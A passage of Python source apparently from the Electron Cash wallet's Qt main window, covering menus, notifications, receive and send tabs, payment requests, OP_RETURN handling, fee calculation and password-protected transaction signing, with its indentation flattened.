self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webbrowser.open("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('{}:{}?message=donation for {}'
.format(NetworkConstants.CASHADDR_PREFIX, d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/Electron-Cash/Electron-Cash/issues\">https://github.com/Electron-Cash/Electron-Cash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"))
@rate_limited(15.0)
def notify_transactions(self):
if self.network and self.network.is_connected() and self.wallet and not self.cleaned_up:
n_ok = 0
num_txns = len(self.tx_notifications)
if num_txns:
# Combine the transactions
total_amount = 0
for tx in self.tx_notifications:
if tx:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0 and is_relevant:
total_amount += v
n_ok += 1
if n_ok:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(n_ok, self.format_amount_and_units(total_amount)))
else:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(total_amount)))
self.tx_notifications = list()
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electron Cash", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electron Cash", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'cash'
if self.decimal_point == 5:
return 'mBCH'
if self.decimal_point == 8:
return 'BCH'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png") if num_chains <= 1 else QIcon(":icons/status_lagging_fork.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png") if num_chains <= 1 else QIcon(":icons/status_connected_fork.png")
else:
icon = QIcon(":icons/status_connected_proxy.png") if num_chains <= 1 else QIcon(":icons/status_connected_proxy_fork.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
self.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
URI = web.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.set_receive_address(self.wallet.get_receiving_address())
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.new_request_button.setEnabled(True)
self.update_receive_address_widget()
def update_receive_qr(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = web.create_URI(self.receive_address, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(self.receive_address_e.text(), amount,
message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin Cash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin Cash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
grid.addWidget(self.message_opreturn_e, 3 , 1, 1, -1)
if not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText("")
self.message_opreturn_e.setHidden(True)
self.opreturn_label.setHidden(True)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 5, 0)
grid.addWidget(self.amount_e, 5, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 5, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 5, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 5, 4)
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 6, 0)
grid.addWidget(self.fee_slider, 6, 1)
grid.addWidget(self.fee_custom_lbl, 6, 1)
grid.addWidget(self.fee_e, 6, 2)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 7, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be under 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
if len(op_return_encoded) > 220:
raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be under 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
fee_rate = None
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if opreturn_message:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
isInvoice= False;
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True;
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if (fee < (tx.estimated_size())):
msg.append(_('Warning') + ': ' + _("You're using a fee less than 1000 sats/kb. It may take a very long time to confirm."))
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("You are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
